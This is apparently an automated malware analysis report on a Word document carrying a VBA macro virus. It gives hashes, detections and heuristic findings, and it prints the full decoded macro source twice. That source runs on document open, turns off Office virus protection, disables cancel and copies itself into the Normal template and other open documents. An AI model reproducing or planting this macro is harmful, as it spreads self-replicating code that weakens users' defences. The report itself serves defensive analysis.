Office (OLE) malware analysis — malicious · f6c86c3a46637d7b

MALICIOUS

Office (OLE)

56.5 KB Created: 2014-12-08 09:05:00 Authoring application: Microsoft Office Word First seen: 2015-09-17

MD5: 4d55eeb33767494d32cbc502c3947931 SHA-1: 93888a9dbc4de376572181ca9d29315ab0f31678 SHA-256: f6c86c3a46637d7b30b523f9c8dd36e64b11cacc236cd450d801e19d4bd61587

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1553.005 Mark-of-the-Web Bypass

The sample contains VBA macros that explicitly disable virus protection and macro security settings. The script also attempts to replicate its code to the current document and potentially the Normal template, which is a common technique for persistence and evasion. The presence of 'Heuristics.Macro.DisableVirusProtection' and 'VBA macro-virus self-replication' heuristics further supports this analysis.

Heuristics 4

ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1413 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1413 bytes
SHA-256: `678ca8df01b2856b9ae0e9719a707fc48a05d9084b1b9c7f0f454639a21aa155`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Close()Open()Close()Open() Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False EnableCancelKey = wdCancelDisabled Set maci = MacroContainer.VBProject.VBComponents.Item(1) Set macic = maci.codemodule ns$ = Left(macic.Lines(1, 1), 21) Set inf = NormalTemplate: nsi$ = ns$ + "Close()" If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()" Set infc = inf.VBProject.VBComponents Set infi = infc.Item(1) Set infic = infi.codemodule infi.Name = "ThisDocument" For mx = 2 To infc.Count infc.Remove infc.Item(2) Next mx If infic.countlines <> macic.countoflines Then infic.deletelines 1, infic.countoflines For coco = 1 To macic.countoflines infic.insertlines coco, macic.Lines(coco, 1) Next coco infic.replaceline 1, nsi$ End If If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName EnableCancelKey = wdCancelDisabled End Sub

SHA-256: 678ca8df01b2856b9ae0e9719a707fc48a05d9084b1b9c7f0f454639a21aa155

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Close()Open()Close()Open()
Private Sub Document_Open()
    On Error Resume Next
    Options.VirusProtection = False
    EnableCancelKey = wdCancelDisabled
    Set maci = MacroContainer.VBProject.VBComponents.Item(1)
    Set macic = maci.codemodule
    ns$ = Left(macic.Lines(1, 1), 21)
    Set inf = NormalTemplate: nsi$ = ns$ + "Close()"
        If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()"
    Set infc = inf.VBProject.VBComponents
    Set infi = infc.Item(1)
    Set infic = infi.codemodule
    infi.Name = "ThisDocument"
    For mx = 2 To infc.Count
        infc.Remove infc.Item(2)
    Next mx
        If infic.countlines <> macic.countoflines Then
            infic.deletelines 1, infic.countoflines
            For coco = 1 To macic.countoflines
                infic.insertlines coco, macic.Lines(coco, 1)
            Next coco
            infic.replaceline 1, nsi$
        End If
    If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    EnableCancelKey = wdCancelDisabled
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.